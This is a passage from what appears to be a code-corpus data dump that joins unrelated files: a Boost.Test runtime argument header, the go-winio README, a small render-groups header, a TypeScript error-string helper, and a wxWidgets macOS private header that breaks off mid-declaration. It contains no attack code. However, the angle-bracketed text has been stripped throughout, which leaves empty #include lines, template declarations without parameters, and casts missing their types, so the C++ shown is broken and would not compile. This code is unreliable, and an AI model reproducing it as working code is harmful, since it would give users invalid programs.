BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n\r\n// Boost.Test Runtime parameters\r\n#include \r\n#include \r\n\r\n// Boost.Test\r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n// STL\r\n#include \r\n\r\n#include \r\n\r\nnamespace boost {\r\nnamespace runtime {\r\n\r\n// ************************************************************************** //\r\n// ************** runtime::argument ************** //\r\n// ************************************************************************** //\r\n\r\nclass argument {\r\npublic:\r\n // Constructor\r\n argument( rtti::id_t value_type )\r\n : p_value_type( value_type )\r\n {}\r\n\r\n // Destructor\r\n virtual ~argument() {}\r\n\r\n // Public properties\r\n rtti::id_t const p_value_type;\r\n};\r\n\r\n// 
************************************************************************** //\r\n// ************** runtime::typed_argument ************** //\r\n// ************************************************************************** //\r\n\r\ntemplate\r\nclass typed_argument : public argument {\r\npublic:\r\n // Constructor\r\n explicit typed_argument( T const& v )\r\n : argument( rtti::type_id() )\r\n , p_value( v )\r\n {}\r\n\r\n unit_test::readwrite_property p_value;\r\n};\r\n\r\n// ************************************************************************** //\r\n// ************** runtime::arguments_store ************** //\r\n// ************************************************************************** //\r\n\r\nclass arguments_store {\r\npublic:\r\n typedef std::map storage_type;\r\n\r\n /// Returns number of arguments in the store; mostly used for testing\r\n std::size_t size() const { return m_arguments.size(); }\r\n\r\n /// Clears the store for reuse\r\n void clear() { m_arguments.clear(); }\r\n\r\n /// Returns true if there is an argument corresponding to the specified parameter name\r\n bool has( cstring parameter_name ) const\r\n {\r\n return m_arguments.find( parameter_name ) != m_arguments.end();\r\n }\r\n\r\n /// Provides types access to argument value by parameter name\r\n template\r\n T const& get( cstring parameter_name ) const {\r\n return const_cast(this)->get( parameter_name );\r\n }\r\n\r\n template\r\n T& get( cstring parameter_name ) {\r\n storage_type::const_iterator found = m_arguments.find( parameter_name );\r\n BOOST_TEST_I_ASSRT( found != m_arguments.end(),\r\n access_to_missing_argument() \r\n << \"There is no argument provided for parameter \"\r\n << parameter_name );\r\n\r\n argument_ptr arg = found->second;\r\n\r\n BOOST_TEST_I_ASSRT( arg->p_value_type == rtti::type_id(),\r\n arg_type_mismatch()\r\n << \"Access with invalid type for argument corresponding to parameter \"\r\n << parameter_name );\r\n\r\n return static_cast&>( *arg ).p_value.value;\r\n }\r\n\r\n /// Set's the argument value for specified parameter name\r\n template\r\n void set( cstring parameter_name, T const& value )\r\n {\r\n m_arguments[parameter_name] = argument_ptr( new typed_argument( value ) );\r\n }\r\n\r\nprivate:\r\n // Data members\r\n storage_type m_arguments;\r\n};\r\n\r\n} // namespace runtime\r\n} // namespace boost\r\n\r\n#include \r\n\r\n#endif // BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n"} {"text": "# go-winio\n\nThis repository contains utilities for efficiently performing Win32 IO operations in\nGo. Currently, this is focused on accessing named pipes and other file handles, and\nfor using named pipes as a net transport.\n\nThis code relies on IO completion ports to avoid blocking IO on system threads, allowing Go\nto reuse the thread to schedule another goroutine. This limits support to Windows Vista and\nnewer operating systems. This is similar to the implementation of network sockets in Go's net\npackage.\n\nPlease see the LICENSE file for licensing information.\n\nThis project has adopted the [Microsoft Open Source Code of\nConduct](https://opensource.microsoft.com/codeofconduct/). For more information\nsee the [Code of Conduct\nFAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact\n[opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional\nquestions or comments.\n\nThanks to natefinch for the inspiration for this library. 
See https://github.com/natefinch/npipe\nfor another named pipe implementation.\n"} {"text": "#ifndef __APPLYRENDERGROUPS_H__\n#define __APPLYRENDERGROUPS_H__\n\nbool ApplyRenderGroups(CEditRegion* pRegion);\n\n#endif\n"} {"text": "export async function initErrorString(tag: string, id: string, foundVia?: string): Promise {\n\tif (tag == null) tag = 'element-tag'\n\tlet estr = `<${tag.toLowerCase()}`\n\tif (id != null) {\n\t\testr += ` id='#${id}'`\n\t}\n\n\tif (foundVia !== null) {\n\t\testr += ` found using '${foundVia}'`\n\t}\n\n\testr += '>'\n\treturn estr\n}\n"} {"text": "/////////////////////////////////////////////////////////////////////////////\n// Name: wx/osx/core/private.h\n// Purpose: Private declarations: as this header is only included by\n// wxWidgets itself, it may contain identifiers which don't start\n// with \"wx\".\n// Author: Stefan Csomor\n// Modified by:\n// Created: 1998-01-01\n// Copyright: (c) Stefan Csomor\n// Licence: wxWindows licence\n/////////////////////////////////////////////////////////////////////////////\n\n#ifndef _WX_PRIVATE_CORE_H_\n#define _WX_PRIVATE_CORE_H_\n\n#include \"wx/defs.h\"\n\n#include \n\n#include \"wx/osx/core/cfstring.h\"\n#include \"wx/osx/core/cfdataref.h\"\n\n// platform specific Clang analyzer support\n#ifndef NS_RETURNS_RETAINED\n# if WX_HAS_CLANG_FEATURE(attribute_ns_returns_retained)\n# define NS_RETURNS_RETAINED __attribute__((ns_returns_retained))\n# else\n# define NS_RETURNS_RETAINED\n# endif\n#endif\n\n#ifndef CF_RETURNS_RETAINED\n# if WX_HAS_CLANG_FEATURE(attribute_cf_returns_retained)\n# define CF_RETURNS_RETAINED __attribute__((cf_returns_retained))\n# else\n# define CF_RETURNS_RETAINED\n# endif\n#endif\n\n#if ( !wxUSE_GUI && !wxOSX_USE_IPHONE ) || wxOSX_USE_COCOA_OR_CARBON\n\n// Carbon functions are currently still used in wxOSX/Cocoa too (including\n// wxBase part of it).\n#include \n\nvoid WXDLLIMPEXP_CORE wxMacStringToPascal( const wxString&from , unsigned char * to );\nwxString WXDLLIMPEXP_CORE wxMacMakeStringFromPascal( const unsigned char * from );\n\nWXDLLIMPEXP_BASE wxString wxMacFSRefToPath( const FSRef *fsRef , CFStringRef additionalPathComponent = NULL );\nWXDLLIMPEXP_BASE OSStatus wxMacPathToFSRef( const wxString&path , FSRef *fsRef );\nWXDLLIMPEXP_BASE wxString wxMacHFSUniStrToString( ConstHFSUniStr255Param uniname );\n\n// keycode utils from app.cpp\n\nWXDLLIMPEXP_BASE CGKeyCode wxCharCodeWXToOSX(wxKeyCode code);\nWXDLLIMPEXP_BASE long wxMacTranslateKey(unsigned char key, unsigned char code);\n\n#endif\n\n#if wxUSE_GUI\n\n#if wxOSX_USE_IPHONE\n#include \n#else\n#include \n#endif\n\n#include \"wx/bitmap.h\"\n#include \"wx/window.h\"\n\nclass WXDLLIMPEXP_CORE wxMacCGContextStateSaver\n{\n wxDECLARE_NO_COPY_CLASS(wxMacCGContextStateSaver);\n\npublic:\n wxMacCGContextStateSaver( CGContextRef cg )\n {\n m_cg = cg;\n CGContextSaveGState( cg );\n }\n ~wxMacCGContextStateSaver()\n {\n CGContextRestoreGState( m_cg );\n }\nprivate:\n CGContextRef m_cg;\n};\n\nclass WXDLLIMPEXP_CORE wxDeferredObjectDeleter : public wxObject\n{\npublic :\n wxDeferredObjectDeleter( wxObject* obj ) : m_obj(obj)\n {\n }\n virtual ~wxDeferredObjectDeleter()\n {\n delete m_obj;\n }\nprotected :\n wxObject* m_obj ;\n} ;\n\n// Quartz\n\nWXDLLIMPEXP_CORE CGImageRef wxMacCreateCGImageFromBitmap( const wxBitmap& bitmap );\n\nWXDLLIMPEXP_CORE CGDataProviderRef wxMacCGDataProviderCreateWithCFData( CFDataRef data );\nWXDLLIMPEXP_CORE CGDataConsumerRef wxMacCGDataConsumerCreateWithCFData( CFMutableDataRef data );\nWXDLLIMPEXP_CORE CGDataProviderRef 
wxMacCGDataProviderCreateWithMemoryBuffer( const wxMemoryBuffer& buf );\n\nWXDLLIMPEXP_CORE CGColorSpaceRef wxMacGetGenericRGBColorSpace(void);\n\nWXDLLIMPEXP_CORE double wxOSXGetMainScreenContentScaleFactor();\n\nclass wxWindowMac;\n// to\nextern wxWindow* g_MacLastWindow;\nclass wxNonOwnedWindow;\n\n// temporary typedef so that no additional casts are necessary within carbon code at the moment\n\nclass wxMacControl;\nclass wxWidgetImpl;\nclass wxComboBox;\nclass wxNotebook;\nclass wxTextCtrl;\nclass wxSearchCtrl;\n\nWXDLLIMPEXP_CORE wxWindowMac * wxFindWindowFromWXWidget(WXWidget inControl );\n\ntypedef wxWidgetImpl wxWidgetImplType;\n\n#if wxUSE_MENUS\nclass wxMenuItemImpl : public wxObject\n{\npublic :\n wxMenuItemImpl( wxMenuItem* peer ) : m_peer(peer)\n {\n }\n\n virtual ~wxMenuItemImpl() ;\n virtual void SetBitmap( const wxBitmap& bitmap ) = 0;\n virtual void Enable( bool enable ) = 0;\n virtual void Check( bool check ) = 0;\n virtual void SetLabel( const wxString& text, wxAcceleratorEntry *entry ) = 0;\n virtual void Hide( bool hide = true ) = 0;\n\n virtual void * GetHMenuItem() = 0;\n\n wxMenuItem* GetWXPeer() { return m_peer ; }\n\n static wxMenuItemImpl* Create( wxMenuItem* peer, wxMenu *pParentMenu,\n int id,\n const wxString& text,\n wxAcceleratorEntry *entry,\n const wxString& strHelp,\n wxItemKind kind,\n wxMenu *pSubMenu );\n \n // handle OS specific menu items if they weren't handled during normal processing\n virtual bool DoDefault() { return false; }\nprotected :\n wxMenuItem* m_peer;\n\n wxDECLARE_ABSTRACT_CLASS(wxMenuItemImpl);\n} ;\n\nclass wxMenuImpl : public wxObject\n{\npublic :\n wxMenuImpl( wxMenu* peer ) : m_peer(peer)\n {\n }\n\n virtual ~wxMenuImpl() ;\n virtual void InsertOrAppend(wxMenuItem *pItem, size_t pos) = 0;\n virtual void Remove( wxMenuItem *pItem ) = 0;\n\n virtual void MakeRoot() = 0;\n\n virtual void SetTitle( const wxString& text ) = 0;\n\n virtual WXHMENU GetHMenu() = 0;\n\n wxMenu* GetWXPeer() { return m_peer ; }\n\n virtual void PopUp( wxWindow *win, int x, int y ) = 0;\n \n virtual void GetMenuBarDimensions(int &x, int &y, int &width, int &height) const\n {\n x = y = width = height = -1;\n }\n\n static wxMenuImpl* Create( wxMenu* peer, const wxString& title );\n static wxMenuImpl* CreateRootMenu( wxMenu* peer );\nprotected :\n wxMenu* m_peer;\n\n wxDECLARE_ABSTRACT_CLASS(wxMenuItemImpl);\n} ;\n#endif\n\n\nclass WXDLLIMPEXP_CORE wxWidgetImpl : public wxObject\n{\npublic :\n wxWidgetImpl( wxWindowMac* peer , bool isRootControl = false, bool isUserPane = false );\n wxWidgetImpl();\n virtual ~wxWidgetImpl();\n\n void Init();\n\n bool IsRootControl() const { return m_isRootControl; }\n \n bool IsUserPane() const { return m_isUserPane; }\n\n wxWindowMac* GetWXPeer() const { return m_wxPeer; }\n\n bool IsOk() const { return GetWXWidget() != NULL; }\n\n // not only the control itself, but also all its parents must be visible\n // in order for this function to return true\n virtual bool IsVisible() const = 0;\n // set the visibility of this widget (maybe latent)\n virtual void SetVisibility( bool visible ) = 0;\n\n virtual bool ShowWithEffect(bool WXUNUSED(show),\n wxShowEffect WXUNUSED(effect),\n unsigned WXUNUSED(timeout))\n {\n return false;\n }\n\n virtual void Raise() = 0;\n\n virtual void Lower() = 0;\n\n virtual void ScrollRect( const wxRect *rect, int dx, int dy ) = 0;\n\n virtual WXWidget GetWXWidget() const = 0;\n\n virtual void SetBackgroundColour( const wxColour& col ) = 0;\n virtual bool SetBackgroundStyle(wxBackgroundStyle style) = 
0;\n\n // all coordinates in native parent widget relative coordinates\n virtual void GetContentArea( int &left , int &top , int &width , int &height ) const = 0;\n virtual void Move(int x, int y, int width, int height) = 0;\n virtual void GetPosition( int &x, int &y ) const = 0;\n virtual void GetSize( int &width, int &height ) const = 0;\n virtual void SetControlSize( wxWindowVariant variant ) = 0;\n virtual double GetContentScaleFactor() const\n {\n return 1.0;\n }\n \n // the native coordinates may have an 'aura' for shadows etc, if this is the case the layout\n // inset indicates on which insets the real control is drawn\n virtual void GetLayoutInset(int &left , int &top , int &right, int &bottom) const\n {\n left = top = right = bottom = 0;\n }\n\n // native view coordinates are topleft to bottom right (flipped regarding CoreGraphics origin)\n virtual bool IsFlipped() const { return true; }\n\n virtual void SetNeedsDisplay( const wxRect* where = NULL ) = 0;\n virtual bool GetNeedsDisplay() const = 0;\n\n virtual bool NeedsFocusRect() const;\n virtual void SetNeedsFocusRect( bool needs );\n\n virtual bool NeedsFrame() const;\n virtual void SetNeedsFrame( bool needs );\n \n virtual void SetDrawingEnabled(bool enabled);\n\n virtual bool CanFocus() const = 0;\n // return true if successful\n virtual bool SetFocus() = 0;\n virtual bool HasFocus() const = 0;\n\n virtual void RemoveFromParent() = 0;\n virtual void Embed( wxWidgetImpl *parent ) = 0;\n\n virtual void SetDefaultButton( bool isDefault ) = 0;\n virtual void PerformClick() = 0;\n virtual void SetLabel( const wxString& title, wxFontEncoding encoding ) = 0;\n#if wxUSE_MARKUP && wxOSX_USE_COCOA\n virtual void SetLabelMarkup( const wxString& WXUNUSED(markup) ) { }\n#endif\n\n virtual void SetCursor( const wxCursor & cursor ) = 0;\n virtual void CaptureMouse() = 0;\n virtual void ReleaseMouse() = 0;\n \n virtual void SetDropTarget( wxDropTarget * WXUNUSED(dropTarget) ) {}\n\n virtual wxInt32 GetValue() const = 0;\n virtual void SetValue( wxInt32 v ) = 0;\n virtual wxBitmap GetBitmap() const = 0;\n virtual void SetBitmap( const wxBitmap& bitmap ) = 0;\n virtual void SetBitmapPosition( wxDirection dir ) = 0;\n virtual void SetupTabs( const wxNotebook& WXUNUSED(notebook) ) {}\n virtual int TabHitTest( const wxPoint & WXUNUSED(pt), long *flags ) {*flags=1; return -1;}\n virtual void GetBestRect( wxRect *r ) const = 0;\n virtual bool IsEnabled() const = 0;\n virtual void Enable( bool enable ) = 0;\n virtual void SetMinimum( wxInt32 v ) = 0;\n virtual void SetMaximum( wxInt32 v ) = 0;\n virtual wxInt32 GetMinimum() const = 0;\n virtual wxInt32 GetMaximum() const = 0;\n virtual void PulseGauge() = 0;\n virtual void SetScrollThumb( wxInt32 value, wxInt32 thumbSize ) = 0;\n\n virtual void SetFont( const wxFont & font , const wxColour& foreground , long windowStyle, bool ignoreBlack = true ) = 0;\n\n virtual void SetToolTip(wxToolTip* WXUNUSED(tooltip)) { }\n\n // is the clicked event sent AFTER the state already changed, so no additional\n // state changing logic is required from the outside\n virtual bool ButtonClickDidStateChange() = 0;\n\n virtual void InstallEventHandler( WXWidget control = NULL ) = 0;\n\n // Mechanism used to keep track of whether a change should send an event\n // Do SendEvents(false) when starting actions that would trigger programmatic events\n // and SendEvents(true) at the end of the block.\n virtual void SendEvents(bool shouldSendEvents) { m_shouldSendEvents = shouldSendEvents; }\n virtual bool ShouldSendEvents() { 
return m_shouldSendEvents; }\n\n // static methods for associating native controls and their implementations\n\n // finds the impl associated with this native control\n static wxWidgetImpl*\n FindFromWXWidget(WXWidget control);\n\n // finds the impl associated with this native control, if the native control itself is not known\n // also checks whether its parent is eg a registered scrollview, ie whether the control is a native subpart\n // of a known control\n static wxWidgetImpl*\n FindBestFromWXWidget(WXWidget control);\n \n static void RemoveAssociations( wxWidgetImpl* impl);\n\n static void Associate( WXWidget control, wxWidgetImpl *impl );\n\n static WXWidget FindFocus();\n\n // static creation methods, must be implemented by all toolkits\n\n static wxWidgetImplType* CreateUserPane( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n static wxWidgetImplType* CreateContentView( wxNonOwnedWindow* now ) ;\n\n static wxWidgetImplType* CreateButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateDisclosureTriangle( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateStaticLine( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateGroupBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateStaticText( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateTextControl( wxTextCtrl* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& content,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateSearchControl( wxSearchCtrl* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& content,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateCheckBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateRadioButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateToggleButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateBitmapToggleButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxBitmap& bitmap,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateBitmapButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxBitmap& bitmap,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n 
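// Editorial note, not part of the original wxWidgets header: each port supplies definitions for\n    // these static Create* factories, typically wrapping the newly created native control in a\n    // port-specific wxWidgetImpl subclass and registering it so FindFromWXWidget() can locate it\n    // later. A rough, hypothetical sketch (wxMyPortButtonImpl is an assumed class name):\n    //     WXWidget native = /* create the native button for this port */ NULL;\n    //     wxWidgetImpl* impl = new wxMyPortButtonImpl( wxpeer, native );\n    //     wxWidgetImpl::Associate( native, impl );\n    //     return impl;\n\n    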
static wxWidgetImplType* CreateTabView( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateGauge( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateSlider( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateSpinButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateScrollBar( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateChoice( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxMenu* menu,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateListBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n#if wxOSX_USE_COCOA\n static wxWidgetImplType* CreateComboBox( wxComboBox* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxMenu* menu,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n#endif\n\n // converts from Toplevel-Content relative to local\n static void Convert( wxPoint *pt , wxWidgetImpl *from , wxWidgetImpl *to );\nprotected :\n bool m_isRootControl;\n bool m_isUserPane;\n wxWindowMac* m_wxPeer;\n bool m_needsFocusRect;\n bool m_needsFrame;\n bool m_shouldSendEvents;\n\n wxDECLARE_ABSTRACT_CLASS(wxWidgetImpl);\n};\n\n//\n// the interface to be implemented eg by a listbox\n//\n\nclass WXDLLIMPEXP_CORE wxListWidgetColumn\n{\npublic :\n virtual ~wxListWidgetColumn() {}\n} ;\n\nclass WXDLLIMPEXP_CORE wxListWidgetCellValue\n{\npublic :\n wxListWidgetCellValue() {}\n virtual ~wxListWidgetCellValue() {}\n\n virtual void Set( CFStringRef value ) = 0;\n virtual void Set( const wxString& value ) = 0;\n virtual void Set( int value ) = 0;\n virtual void Check( bool check );\n\n virtual bool IsChecked() const;\n virtual int GetIntValue() const = 0;\n virtual wxString GetStringValue() const = 0;\n} ;\n\nclass WXDLLIMPEXP_CORE wxListWidgetImpl\n{\npublic:\n wxListWidgetImpl() {}\n virtual ~wxListWidgetImpl() { }\n\n virtual wxListWidgetColumn* InsertTextColumn( unsigned pos, const wxString& title, bool editable = false,\n wxAlignment just = wxALIGN_LEFT , int defaultWidth = -1) = 0 ;\n virtual wxListWidgetColumn* InsertCheckColumn( unsigned pos , const wxString& title, bool editable = false,\n wxAlignment just = wxALIGN_LEFT , int defaultWidth = -1) = 0 ;\n\n // add and remove\n\n // TODO will be replaced\n virtual void ListDelete( unsigned int n ) = 0;\n virtual void ListInsert( unsigned int n ) = 0;\n virtual void ListClear() = 0;\n\n // selecting\n\n virtual void ListDeselectAll() = 0;\n virtual void ListSetSelection( unsigned int n, bool select, bool multi ) = 0;\n virtual int ListGetSelection() const = 0;\n virtual int ListGetSelections( wxArrayInt& aSelections ) const = 0;\n virtual bool ListIsSelected( unsigned int n ) 
const = 0;\n\n // display\n\n virtual void ListScrollTo( unsigned int n ) = 0;\n virtual int ListGetTopItem() const = 0;\n virtual void UpdateLine( unsigned int n, wxListWidgetColumn* col = NULL ) = 0;\n virtual void UpdateLineToEnd( unsigned int n) = 0;\n\n // accessing content\n\n virtual unsigned int ListGetCount() const = 0;\n\n virtual int DoListHitTest( const wxPoint& inpoint ) const = 0;\n};\n\n//\n// interface to be implemented by a textcontrol\n//\n\nclass WXDLLIMPEXP_FWD_CORE wxTextAttr;\nclass WXDLLIMPEXP_FWD_CORE wxTextEntry;\n\n// common interface for all implementations\nclass WXDLLIMPEXP_CORE wxTextWidgetImpl\n\n{\npublic :\n // Any widgets implementing this interface must be associated with a\n // wxTextEntry so instead of requiring the derived classes to implement\n // another (pure) virtual function, just take the pointer to this entry in\n // our ctor and implement GetTextEntry() ourselves.\n wxTextWidgetImpl(wxTextEntry *entry) : m_entry(entry) {}\n\n virtual ~wxTextWidgetImpl() {}\n\n wxTextEntry *GetTextEntry() const { return m_entry; }\n\n virtual bool CanFocus() const { return true; }\n\n virtual wxString GetStringValue() const = 0 ;\n virtual void SetStringValue( const wxString &val ) = 0 ;\n virtual void SetSelection( long from, long to ) = 0 ;\n virtual void GetSelection( long* from, long* to ) const = 0 ;\n virtual void WriteText( const wxString& str ) = 0 ;\n\n virtual bool CanClipMaxLength() const { return false; }\n virtual void SetMaxLength(unsigned long WXUNUSED(len)) {}\n\n virtual bool CanForceUpper() { return false; }\n virtual void ForceUpper() {}\n\n virtual bool GetStyle( long position, wxTextAttr& style);\n virtual void SetStyle( long start, long end, const wxTextAttr& style ) ;\n virtual void Copy() ;\n virtual void Cut() ;\n virtual void Paste() ;\n virtual bool CanPaste() const ;\n virtual void SetEditable( bool editable ) ;\n virtual long GetLastPosition() const ;\n virtual void Replace( long from, long to, const wxString &str ) ;\n virtual void Remove( long from, long to ) ;\n\n\n virtual bool HasOwnContextMenu() const\n { return false ; }\n\n virtual bool SetupCursor( const wxPoint& WXUNUSED(pt) )\n { return false ; }\n\n virtual void Clear() ;\n virtual bool CanUndo() const;\n virtual void Undo() ;\n virtual bool CanRedo() const;\n virtual void Redo() ;\n virtual int GetNumberOfLines() const ;\n virtual long XYToPosition(long x, long y) const;\n virtual bool PositionToXY(long pos, long *x, long *y) const ;\n virtual void ShowPosition(long WXUNUSED(pos)) ;\n virtual int GetLineLength(long lineNo) const ;\n virtual wxString GetLineText(long lineNo) const ;\n virtual void CheckSpelling(bool WXUNUSED(check)) { }\n\n virtual wxSize GetBestSize() const { return wxDefaultSize; }\n\n virtual bool SetHint(const wxString& WXUNUSED(hint)) { return false; }\nprivate:\n wxTextEntry * const m_entry;\n\n wxDECLARE_NO_COPY_CLASS(wxTextWidgetImpl);\n};\n\n// common interface for all implementations\nclass WXDLLIMPEXP_CORE wxComboWidgetImpl\n\n{\npublic :\n wxComboWidgetImpl() {}\n\n virtual ~wxComboWidgetImpl() {}\n\n virtual int GetSelectedItem() const { return -1; }\n virtual void SetSelectedItem(int WXUNUSED(item)) {}\n\n virtual int GetNumberOfItems() const { return -1; }\n\n virtual void InsertItem(int WXUNUSED(pos), const wxString& WXUNUSED(item)) {}\n\n virtual void RemoveItem(int WXUNUSED(pos)) {}\n\n virtual void Clear() {}\n virtual void Popup() {}\n virtual void Dismiss() {}\n\n virtual wxString GetStringAtIndex(int WXUNUSED(pos)) const { return 
wxEmptyString; }\n\n virtual int FindString(const wxString& WXUNUSED(text)) const { return -1; }\n};\n\n//\n// common interface for buttons\n//\n\nclass wxButtonImpl\n{\n public :\n wxButtonImpl(){}\n virtual ~wxButtonImpl(){}\n\n virtual void SetPressedBitmap( const wxBitmap& bitmap ) = 0;\n} ;\n\n//\n// common interface for search controls\n//\n\nclass wxSearchWidgetImpl\n{\npublic :\n wxSearchWidgetImpl(){}\n virtual ~wxSearchWidgetImpl(){}\n\n // search field options\n virtual void ShowSearchButton( bool show ) = 0;\n virtual bool IsSearchButtonVisible() const = 0;\n\n virtual void ShowCancelButton( bool show ) = 0;\n virtual bool IsCancelButtonVisible() const = 0;\n\n virtual void SetSearchMenu( wxMenu* menu ) = 0;\n\n virtual void SetDescriptiveText(const wxString& text) = 0;\n} ;\n\n//\n// toplevel window implementation class\n//\n\nclass wxNonOwnedWindowImpl : public wxObject\n{\npublic :\n wxNonOwnedWindowImpl( wxNonOwnedWindow* nonownedwnd) : m_wxPeer(nonownedwnd)\n {\n }\n wxNonOwnedWindowImpl()\n {\n }\n virtual ~wxNonOwnedWindowImpl()\n {\n }\n\n virtual void WillBeDestroyed()\n {\n }\n\n virtual void Create( wxWindow* parent, const wxPoint& pos, const wxSize& size,\n long style, long extraStyle, const wxString& name ) = 0;\n\n\n virtual WXWindow GetWXWindow() const = 0;\n\n virtual void Raise()\n {\n }\n\n virtual void Lower()\n {\n }\n\n virtual bool Show(bool WXUNUSED(show))\n {\n return false;\n }\n\n virtual bool ShowWithEffect(bool show, wxShowEffect WXUNUSED(effect), unsigned WXUNUSED(timeout))\n {\n return Show(show);\n }\n\n virtual void Update()\n {\n }\n\n virtual bool SetTransparent(wxByte WXUNUSED(alpha))\n {\n return false;\n }\n\n virtual bool SetBackgroundColour(const wxColour& WXUNUSED(col) )\n {\n return false;\n }\n\n virtual void SetExtraStyle( long WXUNUSED(exStyle) )\n {\n }\n\n virtual void SetWindowStyleFlag( long WXUNUSED(style) )\n {\n }\n\n virtual bool SetBackgroundStyle(wxBackgroundStyle WXUNUSED(style))\n {\n return false ;\n }\n\n virtual bool CanSetTransparent()\n {\n return false;\n }\n\n virtual void GetContentArea( int &left , int &top , int &width , int &height ) const = 0;\n virtual void MoveWindow(int x, int y, int width, int height) = 0;\n virtual void GetPosition( int &x, int &y ) const = 0;\n virtual void GetSize( int &width, int &height ) const = 0;\n\n virtual bool SetShape(const wxRegion& WXUNUSED(region))\n {\n return false;\n }\n\n virtual void SetTitle( const wxString& title, wxFontEncoding encoding ) = 0;\n\n virtual bool EnableCloseButton(bool enable) = 0;\n virtual bool EnableMaximizeButton(bool enable) = 0;\n virtual bool EnableMinimizeButton(bool enable) = 0;\n\n virtual bool IsMaximized() const = 0;\n\n virtual bool IsIconized() const= 0;\n\n virtual void Iconize( bool iconize )= 0;\n\n virtual void Maximize(bool maximize) = 0;\n\n virtual bool IsFullScreen() const= 0;\n\n virtual void ShowWithoutActivating() { Show(true); }\n\n virtual bool EnableFullScreenView(bool enable) = 0;\n\n virtual bool ShowFullScreen(bool show, long style)= 0;\n\n virtual void RequestUserAttention(int flags) = 0;\n\n virtual void ScreenToWindow( int *x, int *y ) = 0;\n\n virtual void WindowToScreen( int *x, int *y ) = 0;\n \n virtual bool IsActive() = 0;\n\n wxNonOwnedWindow* GetWXPeer() { return m_wxPeer; }\n\n static wxNonOwnedWindowImpl*\n FindFromWXWindow(WXWindow window);\n\n static void RemoveAssociations( wxNonOwnedWindowImpl* impl);\n\n static void Associate( WXWindow window, wxNonOwnedWindowImpl *impl );\n\n // static creation methods, 
